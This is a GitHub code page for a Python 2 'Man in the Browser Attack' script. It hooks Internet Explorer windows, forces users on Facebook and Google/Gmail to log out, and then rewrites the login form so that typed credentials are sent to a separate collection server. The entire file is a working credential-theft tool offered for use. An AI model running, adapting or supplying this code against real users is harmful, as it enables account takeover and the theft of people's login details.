-
Notifications
You must be signed in to change notification settings - Fork 2
/
mitb.py
80 lines (62 loc) · 2.41 KB
/
mitb.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
#!/usr/bin/env python
__author__ = 'kalcho'
# Man in the Browser Attack
import win32com.client
import time
import urlparse
import urllib
data_receiver = "http://localhost:8080/"
target_sites = {}
target_sites["www.facebook.com"] = {
"logout_url": None,
"logout_form": "logout_form",
"login_form_index": 0,
"owned": False
}
target_sites["accounts.google.com"] = {
"logout_url": "https://mail.google.com/mail/?logout&hl=en",
"logout_form": None,
"login_form_index": 0,
"owned": False
}
# use the same target for multiple Gmail domains
target_sites["www.gmail.com"] = target_sites["accounts.google.com"]
target_sites["mail.google.com"] = target_sites["accounts.google.com"]
clsid = '{9BA05972-F6A8-11CF-A442-00A0C90A8F39}'
windows = win32com.client.Dispatch(clsid)
def wait_for_browser(browser):
# wait for the browser to finish loading a page
while browser.ReadyState != 4 and browser.ReadyState != "complete":
time.sleep(0.1)
return
while True:
for browser in windows:
url = urlparse.urlparse(browser.LocationUrl)
if url.hostname in target_sites:
if target_sites[url.hostname]["owned"]:
continue
# if there is a URL, we can just redirect
if target_sites[url.hostname]["logout_url"]:
browser.Navigate(target_sites[url.hostname]["logout_url"])
wait_for_browser(browser)
else:
# retrieve all elements in the document
full_doc = browser.Document.all
# iterate, looking for the logout form
for i in full_doc:
try:
# find the logout form and submit it
if i.id == target_sites[url.hostname]["logout_form"]:
i.submit()
wait_for_browser(browser)
except:
pass
# now we modify the login form
try:
login_index = target_sites[url.hostname]["login_form_index"]
login_page = urllib.quote(browser.LocationUrl)
browser.Document.forms[login_index].action = "%s%s" % (data_receiver, login_page)
target_sites[url.hostname]["owned"] = True
except:
pass
time.sleep(5)